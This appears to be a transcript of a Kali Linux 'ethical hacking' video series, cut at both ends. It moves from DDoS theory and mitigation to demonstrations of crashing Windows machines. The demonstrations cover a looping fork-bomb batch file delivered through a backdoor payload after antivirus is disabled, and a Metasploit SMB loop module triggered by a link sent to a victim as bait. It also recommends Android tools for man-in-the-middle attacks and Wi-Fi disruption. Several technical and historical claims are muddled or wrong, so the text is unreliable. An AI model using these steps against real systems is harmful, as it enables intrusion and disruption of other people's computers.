that are doing the same thing. That is, just think of it that 1,000 users refreshing the page 1,000 times in a second, and they're doing this for minutes and hours. Just think what will happen to the company's server. So basically, you guys are equivalent to more than 1 million users using the sites simultaneously, and that's not something the server can take. Sites like Google and Facebook have strong servers and algorithms that can easily identify a DOS and block the traffic from that IP address and the IP address itself. But it's not just that the websites that get better, and the black hat hackers too are improving day by day. This leaves a huge scope for understanding the DDoS attack and becoming an asset to one of these sites: the good, the bad, and the ugly. So you might be wondering that what exactly or is the major difference between DOS attack and DDoS attack? A DOS attack is denial of service attack. This means that one computer and one internet connection is used to flood a server with packets, that is either TCP or the UDP packets that use the datagram protocol. The point of such a denial of service attack is to overload the target server bandwidth and other resources. This will make the server inaccessible to others, thereby blocking the website or whatever else is hosted there. A DDoS attack, on the other hand, in most respects it is similar to a DOS attack, but results are much different. Instead of one computer and one internet connection to the DDoS attack, it utilizes many computers and many connections. The computers behind such an attack are often distributed and around the whole world and will be a part of what is known as a botnet. The main difference between a DDoS attack versus a DOS attack, therefore, is that the target server will overload by hundreds or even thousands of requests in the case of former, that is the DOS attack, as opposed to the DDoS attack of just one attacker in the case of the latter. Therefore, it is much, or you can say it is impossible to withstand a DDoS attack as opposed to a normal DOS attack. The reason for that is because if it is a DDoS attack from one particular IP address, then you may go ahead and block the IP address for a specific period of time or for lots of period of time. But let's assume that there are thousands of users all around the world. We cannot go ahead and keep blocking each and every other person, because let's say, for example, I myself have 3 laptops at my home and 2 cell phones. So if I go ahead and you do a distributed denial of service attack, they can block 5 or 10 or maybe let's say 50 at a time. But blocking, so just assume that if a person has 2 computers at his home, or if he can just go to the cyber cafe by just going $2, $5, or maybe 10 rupees, 15 rupees for an hour, that would be more than sufficient for them to go ahead and kill a server or make them down. And it's much harder, or I can say it is impossible, to go ahead and catch the people who actually did DDoS attack. The reason being that there are multiple IP addresses and you cannot actually assume whether it's a DDoS attack actually, or a number of people are trying to log in on your website at the same time. So it can be either of them. So it's not necessary that all the people are actually going ahead and using your using their denial of service attack to go ahead and attack you. It can be like, let's say, for example, I'll take an example of our IRCTC website. That is an Indian website for railway ticket booking and air ticket booking. So most of the time during April, when people get a lot of holidays, you will see that the time that the website is extremely slow, or it will show you that it's under maintenance. The reason for that is because, first of all, there are people booking lots of tickets. Second thing, there are people who are continuously viewing whether their tickets are booked or they are still waiting. And the third thing are that there are people in cyber cafes or other people or travelers who actually go ahead and sit on the website for no reason, just so that they could block the other traffic, and other people can go ahead and tell them the only reason was that because these people cannot get a booking on the railway, the reason being that the site was slow. So they go to these people who are already logged in, and they give him some kind of extra fee, like around 50 rupees, 100 or 200 rupees extra, so that their tickets get booked and it does not go on waiting. So at that point of time, even the websites get down a lot of time. The reason being that multiple people are using it. So you cannot actually go ahead and distinguish between a distributed denial of service attack or just normal people using it at the same point of time. That's the reason it's most likely unable to stop and unable to detect, or sometimes it is able to detect but it cannot stop, and that's why the people have to shut down their server. So yeah, that's the whole concept behind the DDoS attack, and that is it for this tutorial. In the next tutorial, I'll be teaching you about the different levels of attack, the OSI models and stuff.
Hey guys, welcome to the next tutorial of ethical hacking and penetration testing via Kali Linux. So in the previous tutorial, we took a look at different things as to how we can actually go ahead and carry out different types of attacks. So in this tutorial, we'll be taking a look at the different types of or different levels of attacks, and the levels of attacks can be at network level, operating system level, application level, data flood, and protocol feature attacks. So routers, IP switches, firewalls, these attempts to exhaust hardware resources using multiple duplicate packets or software bug are called as different levels of attacks. The equipment vendor OSS, end user equipment. In this part, the attacker, he takes advantage of the way operating and implements their own protocols. Then we have finger bombing. It's an attack a service or machine by using the application attack to exhaust resources. And there are different type of attacks, again known as host computer or network. It's an attack in which massive quantities of data are sent to the target with the integration of intention of using up bandwidth and processing resources. Then we have server, client, PC, and DNS servers. Attacks in which bugs in a network protocol are utilized to take down different networks resources, and the methods of attack includes IP addresses, spoofing, and corrupting DNS server caches as well. So the tendency of DOS attack shows infallibility that perpetrators take aim and move up the OSI model over time. The relocation of the prime target is logical, since more DDoS defense systems focus their primary detection powers on lower layers. Therefore, attacks on the web application layer are increasingly popular. Furthermore, layer 7 penetration, that is the top level layer of the OSI model, it provides an outlet on a business logic layer, which is considered as an abstraction extension of the previously mentioned network protocol suite. So given that the internet is built vertically by multiple protocol layers, it would be perfectly understandable if internet DDoS attacks assume vertical classification as well. While network layers DDoS attack attempts to overwhelm the victim server with bogus requests, the application layer DDoS attacks rely on legitimate ones, such as, let's say for example, the Baitulahi and Deconic in 2011. In layer 7 attacks, DDoS attacks, attacking computers have to set up a full TCP connection. This, while providing genuine IP addresses, is something you cannot dispense with. The entire action proceeding may seem legitimate in the absence of traffic spikes, but it may not also at the same time. They may virtually swindle even a vigilant DDoS mechanism, and they are stealthy, trust me. There's one of the most famous attack known as Manthina 2000 in 2011. So a layer 7 DDoS attack, in contrast to the others, may exploit vulnerabilities in application software, thus circumventing detection and aiming directly at the targeted server as it was used in Manthina 2000 in 2011. In other words, they are more sophisticated since they do not count entirely on a brute force to achieve desired ends. Perhaps the most notable difference, so-called volumetric DDoS attacks strive to bring down network infrastructures and servers by employing high bandwidth consuming flooding. That benefits from an inherent blind spot of the internet medium. On the other hand, layer 7 DDoS attacks take the victim server in the rear, first encouraging well-known applications such as Hypertext Transfer Protocol, Voice over Internet Protocol, VoIP, or DNS, such as that is a domain name system. The goal of application layer DDoS attacks usually have nothing to do with overwhelming bandwidth. Some IT experts call them low and slow for a reason. Frequently at a close range are exhausted CPU or memory resources. Hence, layer 7 DDoS leverage as well inherent flaws and limitations of applications. For example, system resources are always finite; they are not never infinite. There's surprise here actually that heavy resource consumption will eventually render the server incapacitated. So, protection and mitigation of common volumetric attacks is something that IT specialists are familiar with, and in contrast, Layer 7 DDoS attacks often stand as a more formidable challenge. So, in short, to be more clearer, it's very hard for people to go out and actually stop these kinds of DDoS attacks. They're not something that a person can already know what is happening in the background. And you may never know. For example, let's say if a person is trying to go ahead and interfere with your firewall, then you may get an alarm at your IDS that someone is trying to enter your firewall if you have a good IDS, that's intrusion detection system. But when going ahead and doing a DDoS attack, you may never know whether the person is actually going and trying to get into your computer, or is actually just normally visiting the website within multiple IP addresses or through multiple IP addresses, which you are getting a lots of traffic. You may also have noticed that, let's say, for example, if you are going ahead and using your Google, and if you're on a company, on your own, let's say, for example, you're working in a company and you are trying to visit a Google website. Sometimes you are requested to go ahead and enter some specific letters or some addition or multiplication of a few easy mathematics. The reason of behind that is because the people want to know what exactly is the IP address and from where is the source coming. Whether it's just a DDoS attack, because if it is a DDoS attack, then DDoS attack cannot go ahead and answer the to the question of 6 plus 6 or 2 plus 2, or they cannot go ahead and write down something in specific. And at that point of time, the computer will know that, okay, we are getting a DDoS attack and that's why we cannot sustain that. And they will go ahead and straightly ban the user. But there are also ways as to how you can go ahead and avoid that. There are people who have written botnets that are so smart that they can go ahead and easily answer what exactly it is. Let's say, for example, you can take a look at I'll go ahead and show you a famous app which is in the Google Glasses. So here's the Google goggles, not glass actually. So you may be knowing about Google Glass that you just have to go ahead and use your camera to go ahead and, let's say, for example, if I go ahead and use my camera to take a picture of this page, so it will check that the things that are written over here are Google goggles, and it will straight away go ahead and search about Google goggles on the internet. Or if I go ahead and let's say, for example, okay, great. So we have a movie over here with the name of ABCD. So if I go ahead and click a picture of this specific area, only this area, only this area specifically, it will go ahead and scan the image for letters, and it will go ahead and search on the internet. So people have developed such kind of application that can actually detect letters from images, that is the ones that we get as 4 plus 4 or 2 plus 2, that is called as a robot scanning or something like that. And the bot can actually go ahead and answer these things, and people cannot actually go ahead and, again, the servers cannot go ahead and identify whether it's actually a DDoS attack or just a normal user trying to access, and he's answering the question, and the computer may again be at fault. So that's the reason I was telling you that you cannot go ahead and actually protect your computers against DDoS attacks, but you can actually go ahead and try to prevent that. And that is what we would be looking at the next tutorial. So that's it for this tutorial, and just go ahead and DDoS someone else, but just be under the legal limits, guys. Hey guys, welcome to the next tutorial of ethical hacking and penetration testing via Kali Linux. So in the previous tutorials, we took a look as to how we can go ahead and what are the different types of attack, what are the different layers of attack, and how people normally go ahead and DDoS a particular computer or a system or a network. So in this tutorial, I'll be teaching you about how we can go ahead and identify the DDoS attacks and prevent ourselves from them. And yes, a DDoS attack is not only done on a Wi-Fi, on a wireless network, not exactly wireless. The proper term would be that DDoS attacks are not only done over the internet through on a wired connection or on a website only. It's also done on a computer or Wi-Fi network to go ahead and crash the Wi-Fi network and let it reboot again, so that the password may get disrupted and the person will then have access to the network. So if you run your own servers, then you need to be able to identify when you are under attack. That's because the sooner you can establish that problems with your website, DDoS attack, the sooner you can try to do something about it. To be in a position to do this, it's a good idea to familiarize yourself with the typical inbound traffic profile. That means you need to know from where exactly the traffic is coming in. Is it the common way from where always the traffic comes in, or is it coming on the same port from where you normally use, which you normally use it? Let's say, for example, you don't always need to go ahead and use the same port like 120 or 140 or 150, whichever you're using. You can use any normal number of port lines such as 2137 or any random number. Never use the same numbers for the port such as 2222 or 3333, because it's quite easy for the attackers to guess that and actually go ahead and attack you. So the more you know about what your normal traffic looks like, the easier it is to spot on whether it's an attack or it's just a normal profile trying to access some random stuff. So most DDoS attacks start as sharp spikes in traffic and helps to be able to tell the difference between a sudden surge of legitimate visitors and the start of a DDoS attack. So, and it's also a good idea to nominate a DDoS leader in your company who is responsible for acting that in case you are under attack. And there should always be over provisioned bandwidth with your company. It generally makes sense to have more bandwidth available to your web server than you ever think you are likely to need. And that way you can accommodate sudden and unexpected surges in the traffic that could be a result of an advertising campaign or any random stuff. And a special offer or even a mention of your company in the media would suffice that. Even if you over provision the traffic by 100%, or let's say by 500%, let's say you need approximately of 10 GB per month, but you go ahead and get an over provision of approximately 50 GB every month. That likely won't stop a DDoS attack, but it may give you a few extra minutes to act before your resources are overwhelmed. So you need to make sure that you already have a backup of something in case something goes wrong on your website, or someone is actually trying to DDoS or hack into your website. And you have to make sure that they also work offline, not just online. Or they have some kind of internet specialty that even if a system goes offline, you will still be able to work offline even without that specific web page, so that it does not harness your productivity. There are a few technical measures that can be taken to go ahead and run from that attack actually, especially in the first few minutes. And some of these are quite simple. For example, you can rate limit your router to prevent your web server being overwhelmed, and filters to tell you whether your router to drop the packets from obvious source of attack or time out them of open connections more aggressively. You can also drop spoofed or malformed packages which are set lower, such as SYN, ICMP, and UDP flood drop thresholds. But the truth is that while these steps have been effective in the past, DDoS attacks are now usually too large for these measures to have any significant effect. Again, the most you can hope for is they will buy a little time as the attack ramps up. And finally, you can go ahead and always call your ISP or the hosting provider. And the next step is to go ahead and call your ISP provider or host provider if you do not host your own web server. Tell them that you are under attack and ask for help. Keep emergency contacts for your ISP or hosting provider readily available so that you can use this very quickly. Depending on the strength of attack, the ISP or the hoster may already have detected it, or they may themselves start to be overwhelmed by the attack as well. In case the person is actually quite strong who is actually doing the DDoS attack, is attacking you as well as the ISP provider also. So you stand a better chance of withstanding the DDoS attack if your web server is located in a hosting center rather than if you run it yourself. That's because its data center will likely have fair high capacity bandwidth links and higher capacity routers than your company has itself. And its staff will probably have more experience dealing with the attacks. Having your web server located with a hoster will also keep DDoS traffic aimed at your web server off the corporate LAN. So at least that part of your business, including email and possibly voice over IP addresses via IP services, should operate normally during an attack as well. And if attack is large enough, The first thing a hosting company or ISP is likely to do is null route your traffic, which results in packets destined for your web server being dropped before they arrive. And it can be very costly for a hosting company to allow a DDoS attack onto their network because it consumes a lot of bandwidth and it can affect other consumers. So the first thing we might say is it's a black hole for a while. It is a most famous term used by Liam and Tignap, network operating engineers at Peer 1 Hosting. And there's also a managing director of ISP and hosting, that is Tim Pat Duffy Service Providers, agrees that the first thing that we need to do when we see a customer under attack is log on to our routers and stop the traffic getting onto our network. He says, because that takes about 2 minutes to propagate globally using border gateway protocol, and then the traffic falls off. So if that was the end of the story, then the DDoS attack would be successful to get the website back online. Your ISP or hosting company may direct your traffic or divert your traffic to a scrubber when the malicious packets can be removed before the legitimate ones are sent to on your web browser. So we use our experience and various tools to understand how the traffic to our website has changed from what it was receiving before, and to identify the malicious packets. And there's also a famous quote said by the guy at Pier 1 that has it has the capacity to take in, scrub, and send on very high levels of packets of traffic, as much as 20 Gbps. But with the levels of traffic comparable to those experienced by spammers, even the scrubbing effort would likely be overwhelmed. So, do have a DDoS plan or prevention plan in place with your ISP or a hoster so that it can be prevent or begin mitigation or divert your traffic into a mitigation specialist with the minimum delivery delay. And lastly, we have our own legal use of DDoS attack. The government uses DDoS attack to go ahead and target another companies or another, not actually companies, other country's server to go ahead and gather information, or a national spy agency or something. And it's also used to go ahead and stress testing whether to see whether how much capacity your server has before it goes down, or how much can it take before it actually shuts down and crashes the whole thing. It's also used to know exactly whether the company, whether the website or the server can withstand such amount of traffic, or even after traffic, if they are somehow able to restore, what are the ways that they can go and restore, and how much can they actually protect the system after it has been restored, whether the firewall is down after the DDoS attack, or it can go and lead to some kind of privacy problem, because if the website is down and the people can easily get access into that, then anyone can go ahead and distribute or leak any kind of data that you have in the system. That is why. So these are the different types of attacks that can be done, and these are different ways that can be used to go ahead and stop or use a DDoS attack for your own purposes. And that is it for this tutorial. And that would be it for the PowerPoint presentation for these tutorials. And the next tutorial, I'll be teaching you more about actually doing a DDoS attack in a Windows 7 or a Windows 2008 server, and I'll be showing you multiple ways as to how we can go ahead and do that, and we'll be looking at that in the next tutorial. Hey guys, welcome to the next tutorial of ethical hacking and penetration testing via Kali Linux. So in the previous tutorials, we saw lots of things as to what exactly a DDoS attack. I gave you two different scenarios of one of the bus and other of the multiplayer online game of swimming pool as to what exactly DDoS attacks are, how they can be performed, and I also showed you different ways as to how we can go ahead and stop them. But there's nothing much when a person already has much we can do in case of DDoS attacks. And the second thing is that if the person who is actually DOSing your machine, if you already has access to your computer, there's no way to prevent that unless you are Julian Assange or Kevin Mitnick or David Kennedy. And these are the most dangerous hackers of all time. The only way you could go ahead and save your data will be to just go ahead and disconnect your computer or the wire or cable connection from your computer and stop your computer from actually, let's say, overloading itself or the machines. And just one thing, that if the person who's actually DOSing your machine, if he has good amount of knowledge in programming and electrical programming, that is the hardware programming, then he can even write softwares that could DOS your hardwares that could actually go ahead and let's say overload your the power or the voltage to your hardware inside your system, and it can even go ahead for it also your hardwares, which may not even start anytime soon. It seems scary. It is scary, and there's no way to prevent it. But the only thing that you can do to go ahead and prevent yourself would be to stay vigilant all the times. So now coming back to our point of Kali Linux, we will go ahead and check as to how we can go ahead and actually do some kind of different attacks. So we can either attack a server or a website or even a computer. So today, as I don't have a website that I can go ahead and DOS to, or else I would go to jail if I go ahead and do DOS some random website. I cannot do that, but I would be showing you as to how we can go ahead and do that in multiple ways. The first thing would be that I will assume that we already have access to the person's computer, and if I already have that and I quickly want to DOS attack the computer, I cannot actually go ahead and let's say wait or take my own sweet time to go ahead and DOS a computer, since it would take quite a time to go ahead and let's say send multiple packets to a computer. It will take at the minimum of approximately 3 to 4 minutes for me to do that. So what I could do is I can go ahead and write down a script in specific. I'll show you as to how I can go ahead and do that. So I wrote this script previously, and it was in batch format. So I wrote this script previously, and I explain this to you as to how exactly this works. This is that means go ahead and start a command prompt in a bash, then start it, then I can go back to it. So this will keep on looping itself till forever, because there's no stop to it. Even you cannot go ahead and close, no matter what you do, no matter what kind of antivirus you have, or no matter what you do, it will not stop until there's no way to stop it. Even if you have like 8 GB of RAM, it will keep on continuing. And because I'll show you, I'll just go ahead and start my task manager at the same point of time, and I'll show you that how exactly this process keep on multiplying itself and there's no way to stop it. And so this is one way as to DDoS a computer. This is not actually DOSing your computer in a professional manner, but this is how you can do if you don't have any time. This is the noobiest way that a person can do. Let's say for example, you already have a interpreter prompt with you. I'll just go ahead and start my Kali Linux at the same time. Okay, yes. So if you have access to the computer's machine, then you can go ahead and open the command prompt, and or you can go ahead and simply transfer the batch file from your Linux computer to Windows 7 over here and start the batch file. But the person who is actually on the computer can see that the batch file is running. So he may or may not be able to go ahead and stop the service at that point of time. And again, I'm saying he may not be able to, because most of the time he will not be able to. But if he is something like Robert Downey Jr. from the Iron Man, or Tony Stark, or let's say he has an extremely strong computer, let's say like 32 GB of RAM. So this will take lots of time, and I'll show you exactly how this works before I go ahead and explain this to you as to how this works. I double click it, and see, as you can see, I cannot even right click to my computer, and my computer has gone for a toss, and there's no way I can stop it as far as I know. No matter what you do, I will have to forcefully close this. And so this is one way of doing that. Just go ahead and plug out the power if you are, and it will work. But that's the only way that you can do that. So if you have already access to your machine, that you have already gained access to your target computer, you can simply transfer this file which you already have written in Kali Linux. Just transfer this batch file to Windows and run it. But the person will know that this is running, and he may be able to do something. That is one thing. There's also one more method. There are two different methods that we can go ahead and use to actually attack the person without him knowing that. And I'll just go ahead and start my Kali Linux. The other way is that we instead of going ahead and opening a reverse interpreter, or you can also do that, just go ahead and open a shell prompt and run this simple prompt via Kali Linux through the command prompt, which would be invisible to the user at that point of time. His computer will suddenly hang in between, and it won't work actually. So I'll go ahead and show you as to how exactly it will look like. So I'll just go ahead and quickly create a payload over here, and I'll just copy the this batch file, or I'll just assume that okay, I'll just first create this payload and transfer it over here. And social engineering toolkit mass may load, and I'll just go down. This is my IP address, We can use either the Windows TCP shell reverse attacker, which will create a command shell, or you can go ahead and use a interpreter. I would normally use a interpreter. The reason being that what I could do is I can go ahead and use anything that I want, or gain all the system files to my computer, gain access to all of those things, and after I have all the files that I need, I will go ahead and crash the computer. So this file will be created, and I'll just go ahead and stop my Defender for the time being. Is it updating? Okay, perfect. So my Defender is off. Perfect. And I believe my virus has been created, and I'll start the listener over here. And let me check my payload. It is in the SET home directory. So while the MSF console starts, it will take quite a time. I'll just go to the root and SET, and okay, this is not the one I was looking for. Probably just go back to my root folder, file system, user, share, SET. Okay, it's taking quite a while. Share. Okay, we have the SCT, and here we have our payload file. So I'll just copy it and paste it over here. Okay. I'll just turn this off, and I'll just make Kali Linux. Okay. Okay, I should be able to copy that payload file over here. Perfect. And I'll just cut it and paste it over here. So I'll just assume that you have sent this file somehow to your attacker, and he has accepted it. I'll just go ahead and start the payload, and my connection over here will be started. Session-L. Okay, it should be sessions-L, sorry, sessions-I-1. I have my interpreter, so I'll just go ahead and open the shell prompt, and I am on desktop. So I would do is that I want to go ahead and run this file test.bat. So I'll just go ahead and type it over here. So I'll just type, I don't know exactly how it does, test period BAT, I believe, and yep, the file has started. And as you can see, it's again gone into a big loop, and the person will not even know. So this is one way of actually going ahead and doing that. Again, I'll just force close this, and I'll open it once more. As you can see that this file is not yet corrupted, the reason being that it is on desktop, and I purposely did that. But if this file was in system Windows system32 folder, and you actually link this to some of the system32 files by a bit simpler coding, then you can actually go ahead and destroy the system files, and the person will not even be able to recover all those things. I'll just go ahead and stop this. Background channel, no, and I'm back to my original place. So this is one way of going ahead and attacking the Kali Linux. I'll go ahead and temporarily delete that because I don't want to accidentally do that once more, and this as well. Okay, so that is it for this tutorial. In the next tutorial, I'll teach you how we can go ahead and DDoS this machine, and without actually the person knowing that I have executed something. So that's it for this tutorial, and let's go ahead and take a look at next tutorial as to how we can actually DDoS a person without actually running something on his computer. Welcome to the next tutorial of ethical hacking and penetration testing, and this would be my last tutorial for the DDoS attacks. And before we move on to the client-side application hacks, I want to do at least one more operating system hack. And vulnerabilities still exist in the new operating system, but they're becoming more rare and rarer. In the previous tutorials, I taught you as to how I can go ahead and do a DDoS attack after I have access to the person's computer.
But in this tutorial, it would be something different. I won't be running any application from his computer, or I won't be first accessing his computer, or even not accessing his computer. I will not even access his computer at the very beginning. So Windows 7 was released like a lot of time before, but still there are people who actually use that. I don't know for why, because Windows 8 has much more security, but again it has its own different weird kind of bugs which will again irritate a person, and the person will be so irritated that he will go back to using Windows XP. It may be a hyperbole or something, but that's how Windows works. So I would anytime prefer a Linux system, but even Linux has its own bugs, and at least in Windows you can at least solve a bug, but in Linux it does not have that amount of bugs, but it is 10 times quicker, and it's almost like most of the time it is impossible to hack unless it is the user's fault through social engineering, and Linux is almost vulnerable to most of the kinds of attacks unless the person is extremely intelligent, and he tries to go ahead and find some bugs in the kernels and tries to inject his virus inside that, and that also through the source file, that is through the source website, which is again almost like nearly impossible to do, but not impossible. So besides the Linux talk, in this hack I will take advantage of the flaw in the Windows 7 and the Windows Server 2000 operating system that will create an infinite loop and crash the system. Although this is not nearly as much fun as owning the system, it can be very destructive to an institution that relies upon this system to run their organization. And as you can see, most of the operating system, or even I'll just go ahead and show you the Microsoft website. You can go ahead and use the techniques such as the DNS one, which I taught you in the previous tutorials, in these different tools, through which I can go ahead and actually gather the information as to which server, Windows server, is the person actually using, whether it's 2008, 2003 or 2012. And if you go ahead and check, most of the people will normally use the 2008 server because it is very user friendly, but at the same time it has its own vulnerabilities. So it can be very destructive to this organization without them knowing that how actually system works. They directly go ahead and implement that. So enough talk, let's get started. Fire up our Metasploit and let's hack. So if you're new to Metasploit, then check out my previous tutorials as to how you can go ahead and do these kind of attacks and pass some hacks. So little background material. Remember that Metasploit has different types of modules, exploits, payloads, auxiliaries, encoders, NOPs and posts. So in this hack, I will use the auxiliary module to attack the Windows 7 and the Windows Server 2008 based system SMBs. So just go ahead and fire up the MSF console by typing MSF console and wait for around 2 to 3 minutes, or maybe 5 if you have a slower system. Okay, so we have our Metasploit started, and if you got these same things, access security permission denied, then this is just for you can say it's a kind of a troll that Metasploit has written. So if you're new to Metasploit and you see these things, then don't worry about that, because this is just for fun, and that Metasploit has created so that it could go ahead and troll new noobs or new users. So just don't worry about that and ignore. And as you can see, we have 1389 exploits, 788 auxiliary, 356 payloads, and 37 encoders, 8 knobs, and 223 posts over here. And when I say post, it is not our Facebook post, it is the post exploit that we would use after going ahead and hacking into a PC. So let's go ahead and start our exploit by typing use auxiliary. I used this module when I was using Backtrack. I don't exactly know whether this still works on our Kali Linux, but still go ahead and try to use that. Auxiliary Windows SMB / MS10 underscore negotiate, I believe, and I'll just type, I think that this was underscore loop. Let's check if we have this module or if this has been, okay, I believe this has been deleted. And let's check. Okay, so we have all these things and we wanted the Windows SMB, so let's check. We have the SMB exploit and we want the MS10. I believe MS10 was removed. We want more. Let's check the SMB09. Yeah, we have the SMB10 negotiate response loop. Perfect. So we will be using this module. And the only thing about it was that it's written 006 over here, and I'll type Control C and I'll use I'll just go and delete this. I'll paste it over here. Perfect. So, and now I'll go ahead and type show options, and okay, S should be smaller. So as you can see that we have, these are the SRV host, SRV port, SSL. That would be the false since we are negotiating SSL for incoming connections, and this would be the path for a custom SSL certificate. So now I will type the auxiliary actually module that we have used, and then we will click show options. So now we will be setting the SRV host. So and we will type the SRV host by going ahead and typing SET, and let's say, so we will be using the SRV, we will be setting up the SRV host, that is our computer. So I'll just type ifconfig, and this is my IP address. In your case it would be different. So I'll just type set in capital, make sure that you write it exactly as it is, or you can just copy paste it from over to here, set SRV host, and just type paste and hit enter. We have set our SRV host. Now we need to go ahead and set our okay. So yeah, perfect. Now since we have SRV host, now we need to go ahead and use the run, and in the last step we will run our auxiliary modules before we go ahead and actually execute these things. So everything would be different. So now this would be the last step that I would be doing, is that, and we will run the auxiliary module, and once the auxiliary module executes, it generates a shared folder link, which then you can go ahead and send to the target machine. And in this case the link would be something different. So I'll just type run over here. I don't remember exactly, run should be in capital or small. I'll just go ahead and run. Okay, perfect, it is running, and trigger the vulnerable client to try to access shared anything. And so what I would do is that I'll just go ahead and copy this, and I'll go to this website over here. I can go ahead and run this by going ahead and tapping it over here. Most probably I should be able to. Let's see if I am able to. As you can see, my computer has become a bit slow. It will probably hang itself. Perfect. So what I actually did was that as you can see, if you go ahead and run this computer, it will not run, it will just go ahead and stop. So yes, that's a bit confusing. So what I did was that I should go ahead and send this specific thing to my target computer, and as soon as he clicks this specific link, I can go ahead and send him something like, to make it look more safe, I can go ahead and send him some kind of web page, or I can say, oh my god, look at this specific image, or something through email or through Facebook or something else. But as soon as he clicks this thing, his computer is hanged. As you can see, I cannot go ahead and type anything, or I cannot go ahead and run anything from over here. I'll just try to press Control Alt, and then my mouse will be released. If I click over here, it's hanged. I cannot do anything. So in fact, I have DDoSed my Windows 7. If you're a bit confused, I'll explain this to you once more. I created this is a SMB loop over here. As you can see, I used this specific payload to go ahead and attack this computer, and then I went ahead and created this specific link. So I just needed to go ahead and send this specific link to our target, and as soon as he clicked this link or ran this link through the browser or through run or through any other thing, this computer will freeze and it will not move, or nothing will happen in his computer. As you can see, not even the numlock option will be running. So yes, that is it for this tutorial. You can just go ahead and send any random links to the person's computer, and he will be able to he will just crash his own computer by himself, and he won't even come to know what exactly happened. So that's it guys for this tutorial, and that would be the last tutorial for the DDoSing of a computer or through Kali Linux, or for the DDoS. In the next tutorial, we will be taking a look at how we can go ahead and actually hack into an Android system. But as I don't have an Android with me right now, I'll be just showing you as to how we can do that. I won't be actually able to perform an Android attack. So that's it guys for this tutorial. See you next time. Hey guys, and welcome to the next tutorial of ethical hacking and penetration testing via Kali Linux. So in the previous tutorials, I taught you about hacking a Windows machine and other different types of Trojans, and how we can go ahead and do DDoS attacks on multiple machines by doing a distributed denial of service attack or just a denial of service attack. I also taught you as to how I can go ahead and actually, after penetrating a computer, how I can actually go ahead and run let's say a DDoS file from his computer, or I can just do it without even accessing his computer. I can just go ahead and send him a link, and as soon as he clicks on that link, boom, his computer will totally stop responding, and he will have to actually unplug the computer because everything, the keyboard, the mouse, and even his processor, everything will stop working, and it will go ahead and create an infinite loop in the background, which will make the computer stop working. It will not even give the user a second's time to go ahead and make any kind of changes, or because as soon as he clicks this link, he won't even be able to move his mouse and everything will be stopped. So we saw all of those things in the previous tutorials. But let's do something different this time. We will be, in this tutorial, we will be taking a look as to how we can actually go ahead and hack into Android and hack a computer using an Android. And as you know that Android is the main platform for that is Java, and it's mostly or almost a type of Linux. If you have ever used a terminal in Android, I'll just go ahead and show you some specific apps that I have been going through. So if you terminal emulator Android, you can go on the Google Play Store, and there are different applications through which you could go ahead and run this kind of specific terminal on your Android. You can just run the terminal emulator, or there is one more, I don't remember exactly. Terminal IDE. Perfect. So these are the two most awesome terminals that you could run on your Android. And if you have if you have a rooted phone, and in case you don't know what root is actually gaining administrative rights, or not even administrative, the system rights to a phone. Normally when you get a phone, you only have you only have the user rights. When, let's say for example, when you go ahead and open your Windows system, you can either go and get your system rights or the user rights. So similarly, when you purchase a new phone, you normally go ahead and get only the user rights. You don't have the administrative rights, so you cannot go ahead and actually uninstall the system files. So you can go to your you put your website, your cell phone name. For example, mine is Nexus 5, so you can type Nexus 5 root, and you can type XDA, and XDA is a website where you can get a root for any kind of cell phone. Almost all cell phones, you'll find all types of root over here. So this XDA specific website, this is the forum where you can get any kind of websites and tools that you need. Not websites, sorry, you can get any kind of let's say mods that you need for your cell phone. And right now I'll be showing you different tools through which you could go ahead and hack into another person's cell phone, or you could go ahead and actually hack into another person's network. And it can also go ahead and lead to how anyone else can go ahead and access your network as well. So besides these apps, if you are running it as a root, then it's awesome, and it will also find similar. And if you're using Nexus 5 or Nexus 7, Nexus 8, Nexus 9, it doesn't matter which one, you can also go ahead and download the Kali Linux for Nexus. And because it works only on Nexus and OnePlus 1, it will also work on other let's say other phones as well, such as Note 2, Note 3, but it may not work that good, and some modules may not work. So if you have Nexus series, then you can go ahead and download NetHunter version of Kali Linux, and this is the Kali Linux version for NetHunter. You can go ahead and download this specific thing for your it starts from Nexus 4 to Nexus 10, and it also has it also supports OnePlus 1 as well. So as you can see, NetHunter runs on chroot environment on Android device. So if you start a system via Android application, blah blah blah, and all these things. So you can go ahead and run this all by yourself, but you need a rooted phone for this, else it will not work. And it has HID keyboard, that's Teensy keyboard, bad USB man in the middle attacks, and one-click mana evil access point. There's nothing better you can get instead of this. It also has a 802.11 frame injection, and which supports variety of USB and ICs. That means you can also connect your own USB router to your cell phone, and you can run these things. So this is a lot of fancy stuff, and if you don't have that much knowledge of actually going ahead and running this on your cell phone, then I can also show you different tools that you don't need to go ahead and install the Kali Linux NetHunter. If you have other cell phones or normal cell phone, any random cell phone with at least a minimum of 512 MB of RAM, or if you have rooted it, then it's more than enough. So I'll show you different applications which you could use to go ahead and use it for your penetration testing. So the first thing would be terminal emulator, as I showed you, and the terminal IDE. IDE normally takes up a good amount of space, and we also have the SSH option to go ahead and let me check which one was it exactly. I believe it was, let me check. I believe we can also go ahead and connect through terminal IDE, but I use, yeah, SSH Droid. Perfect. So this one I was searching for. You can use SSH Droid to go ahead and securely connect any of your, don't just ignore this one because this ratings are given by people who cannot actually use this. So you can also use the SSH Droid to connect to your cell phone or your computer. It may be Linux or Windows securely. This is another tool through which you can go ahead and securely connect to any of your remote machines. Then we have the DSploit, which is now Xanti2, but I don't actually like the Xanti2, so I would be again, as you can see, DSploit merges with Xanti2, but still you will be able to find the DSploit version over here. Save browsing, continue information. Okay, how can I go ahead and, okay, maybe due to my computer's limitations, I won't be able to access this page, and yes. Just ignore this part and actually you can go ahead and go through. I'll just go ahead and remove the S version and I'll just try to, perfect, it won't work. Perfect. Details, visit this unsafe site. Perfect. So you can either download the Dsploit APK from anywhere over here. I have been using that since a long time and it's a good application, and it also works offline. That means if you are even connected to Wi-Fi and if you don't even have the access on the Wi-Fi on the person's Wi-Fi, then it will still work. That means you can still disrupt the person's Wi-Fi service. But Xanti is also good. That's Zimperium Xanti2. You can do different types of man-in-the-middle attacks, port scanning, but you need to go ahead and log in, and it's not, you can say, it will not make you anonymous at any point of time. That's the reason I don't like Xanti2. But the features that it has, if you're a penetration tester and if you're not looking for going anonymous on this specific thing, then Xanti2 is for you. It has all the features and even better features than Dsploit. So after Dsploit, we have Network Spoofer, which is also a very good application. And you can download Network Spoofer from over here. This is the original website. We can go ahead and create a fake, let's say, for example, the better way to tell you this would be, let me rephrase this. Network Spoofer goes ahead and spoof the person's specific IP addresses, the MAC ID, and all this stuff. It can all go ahead and do multiple spoof. Let's say, for example, if you're already in someone's computer, let's say, for example, I'm using this computer through Wi-Fi and someone else is also have the access to my Wi-Fi who is using this network 